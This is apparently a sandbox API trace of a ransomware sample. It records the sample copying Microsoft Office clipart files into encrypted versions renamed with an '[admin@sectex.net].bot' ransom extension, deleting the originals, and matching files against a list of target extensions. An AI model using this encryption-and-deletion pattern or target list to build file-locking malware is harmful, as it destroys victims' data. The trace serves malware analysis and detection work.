	[0169.905] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174315.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0170.384] GetLastError () returned 0x0
	[0170.384] ReadFile (in: hFile=0x17c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x16e8, lpOverlapped=0x0) returned 1
	[0170.386] WriteFile (in: hFile=0x180, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x16f0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x16f0, lpOverlapped=0x0) returned 1
	[0170.387] ReadFile (in: hFile=0x17c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.387] WriteFile (in: hFile=0x180, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.387] SetEndOfFile (hFile=0x180) returned 1
	[0170.387] CloseHandle (hObject=0x180) returned 1
	[0170.387] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.387] SetEndOfFile (hFile=0x17c) returned 1
	[0170.389] CloseHandle (hObject=0x17c) returned 1
	[0170.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.390] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174315.wmf")) returned 1
	[0170.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.390] lstrlenW (lpString=".doc") returned 4
	[0170.390] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.391] lstrlenW (lpString=".docx") returned 5
	[0170.391] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0170.391] lstrlenW (lpString=".pdf") returned 4
	[0170.391] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.391] lstrlenW (lpString=".xls") returned 4
	[0170.391] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.391] lstrlenW (lpString=".xlsx") returned 5
	[0170.391] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0170.391] lstrlenW (lpString=".ppt") returned 4
	[0170.391] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.391] lstrlenW (lpString=".zip") returned 4
	[0170.391] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.391] lstrlenW (lpString=".rar") returned 4
	[0170.391] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.391] lstrlenW (lpString=".bz2") returned 4
	[0170.391] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.391] lstrlenW (lpString=".7z") returned 3
	[0170.391] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.391] lstrlenW (lpString=".dbf") returned 4
	[0170.391] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.391] lstrlenW (lpString=".1cd") returned 4
	[0170.391] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.391] lstrlenW (lpString=".jpg") returned 4
	[0170.391] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.391] lstrlenW (lpString=".doc") returned 4
	[0170.391] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.391] lstrlenW (lpString=".docx") returned 5
	[0170.391] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0170.391] lstrlenW (lpString=".pdf") returned 4
	[0170.392] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.392] lstrlenW (lpString=".xls") returned 4
	[0170.392] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.392] lstrlenW (lpString=".xlsx") returned 5
	[0170.392] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0170.392] lstrlenW (lpString=".ppt") returned 4
	[0170.392] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.392] lstrlenW (lpString=".zip") returned 4
	[0170.392] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.392] lstrlenW (lpString=".rar") returned 4
	[0170.392] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.392] lstrlenW (lpString=".bz2") returned 4
	[0170.392] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.392] lstrlenW (lpString=".7z") returned 3
	[0170.392] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.392] lstrlenW (lpString=".dbf") returned 4
	[0170.392] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.392] lstrlenW (lpString=".1cd") returned 4
	[0170.392] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 63
	[0170.392] lstrlenW (lpString=".jpg") returned 4
	[0170.392] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.392] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.392] lstrlenW (lpString="J0175361.JPG") returned 12
	[0170.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0171.008] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=46461) returned 1
	[0171.008] CloseHandle (hObject=0x17c) returned 1
	[0171.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg")) returned 0x20
	[0171.064] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0171.065] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.065] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0171.065] GetLastError () returned 0x0
	[0171.065] ReadFile (in: hFile=0x1d8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xb57d, lpOverlapped=0x0) returned 1
	[0171.106] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xb580, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xb580, lpOverlapped=0x0) returned 1
	[0171.108] ReadFile (in: hFile=0x1d8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.108] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.108] SetEndOfFile (hFile=0x3a4) returned 1
	[0171.108] CloseHandle (hObject=0x3a4) returned 1
	[0171.108] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.108] SetEndOfFile (hFile=0x1d8) returned 1
	[0171.110] CloseHandle (hObject=0x1d8) returned 1
	[0171.111] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.111] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg")) returned 1
	[0171.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.112] lstrlenW (lpString=".doc") returned 4
	[0171.112] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.112] lstrlenW (lpString=".docx") returned 5
	[0171.112] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1
	[0171.112] lstrlenW (lpString=".pdf") returned 4
	[0171.112] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.112] lstrlenW (lpString=".xls") returned 4
	[0171.112] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.112] lstrlenW (lpString=".xlsx") returned 5
	[0171.112] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1
	[0171.112] lstrlenW (lpString=".ppt") returned 4
	[0171.112] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.112] lstrlenW (lpString=".zip") returned 4
	[0171.112] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.112] lstrlenW (lpString=".rar") returned 4
	[0171.112] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.112] lstrlenW (lpString=".bz2") returned 4
	[0171.112] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.112] lstrlenW (lpString=".7z") returned 3
	[0171.112] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.112] lstrlenW (lpString=".dbf") returned 4
	[0171.112] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.112] lstrlenW (lpString=".1cd") returned 4
	[0171.112] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.112] lstrlenW (lpString=".jpg") returned 4
	[0171.112] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.113] lstrlenW (lpString=".doc") returned 4
	[0171.113] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.113] lstrlenW (lpString=".docx") returned 5
	[0171.113] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1
	[0171.113] lstrlenW (lpString=".pdf") returned 4
	[0171.113] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.113] lstrlenW (lpString=".xls") returned 4
	[0171.113] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.113] lstrlenW (lpString=".xlsx") returned 5
	[0171.113] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1
	[0171.113] lstrlenW (lpString=".ppt") returned 4
	[0171.113] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.113] lstrlenW (lpString=".zip") returned 4
	[0171.113] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.113] lstrlenW (lpString=".rar") returned 4
	[0171.113] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.113] lstrlenW (lpString=".bz2") returned 4
	[0171.113] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.113] lstrlenW (lpString=".7z") returned 3
	[0171.113] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.113] lstrlenW (lpString=".dbf") returned 4
	[0171.113] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.113] lstrlenW (lpString=".1cd") returned 4
	[0171.113] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 63
	[0171.113] lstrlenW (lpString=".jpg") returned 4
	[0171.113] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.114] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.114] lstrlenW (lpString="J0182898.WMF") returned 12
	[0171.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182898.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0171.114] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=15150) returned 1
	[0171.114] CloseHandle (hObject=0x1d8) returned 1
	[0171.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182898.wmf")) returned 0x20
	[0171.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182898.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182898.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0171.115] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.115] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182898.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0171.115] GetLastError () returned 0x0
	[0171.115] ReadFile (in: hFile=0x1d8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3b2e, lpOverlapped=0x0) returned 1
	[0171.172] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3b30, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3b30, lpOverlapped=0x0) returned 1
	[0171.173] ReadFile (in: hFile=0x1d8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.173] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.173] SetEndOfFile (hFile=0x3a4) returned 1
	[0171.173] CloseHandle (hObject=0x3a4) returned 1
	[0171.173] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.174] SetEndOfFile (hFile=0x1d8) returned 1
	[0171.176] CloseHandle (hObject=0x1d8) returned 1
	[0171.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.176] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182898.wmf")) returned 1
	[0171.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.177] lstrlenW (lpString=".doc") returned 4
	[0171.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.177] lstrlenW (lpString=".docx") returned 5
	[0171.177] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.177] lstrlenW (lpString=".pdf") returned 4
	[0171.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.177] lstrlenW (lpString=".xls") returned 4
	[0171.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.177] lstrlenW (lpString=".xlsx") returned 5
	[0171.177] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.177] lstrlenW (lpString=".ppt") returned 4
	[0171.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.177] lstrlenW (lpString=".zip") returned 4
	[0171.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.177] lstrlenW (lpString=".rar") returned 4
	[0171.177] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.177] lstrlenW (lpString=".bz2") returned 4
	[0171.177] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.177] lstrlenW (lpString=".7z") returned 3
	[0171.177] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.177] lstrlenW (lpString=".dbf") returned 4
	[0171.177] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.178] lstrlenW (lpString=".1cd") returned 4
	[0171.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.178] lstrlenW (lpString=".jpg") returned 4
	[0171.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.178] lstrlenW (lpString=".doc") returned 4
	[0171.178] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.178] lstrlenW (lpString=".docx") returned 5
	[0171.178] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.178] lstrlenW (lpString=".pdf") returned 4
	[0171.178] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.178] lstrlenW (lpString=".xls") returned 4
	[0171.178] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.178] lstrlenW (lpString=".xlsx") returned 5
	[0171.178] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.178] lstrlenW (lpString=".ppt") returned 4
	[0171.178] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.178] lstrlenW (lpString=".zip") returned 4
	[0171.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.178] lstrlenW (lpString=".rar") returned 4
	[0171.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.178] lstrlenW (lpString=".bz2") returned 4
	[0171.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.178] lstrlenW (lpString=".7z") returned 3
	[0171.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.178] lstrlenW (lpString=".dbf") returned 4
	[0171.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.179] lstrlenW (lpString=".1cd") returned 4
	[0171.179] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 63
	[0171.179] lstrlenW (lpString=".jpg") returned 4
	[0171.179] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.179] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.179] lstrlenW (lpString="J0183172.WMF") returned 12
	[0171.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183172.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.204] GetFileSizeEx (in: hFile=0x354, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=29788) returned 1
	[0171.204] CloseHandle (hObject=0x354) returned 1
	[0171.204] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183172.wmf")) returned 0x20
	[0171.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183172.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183172.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.284] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.285] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
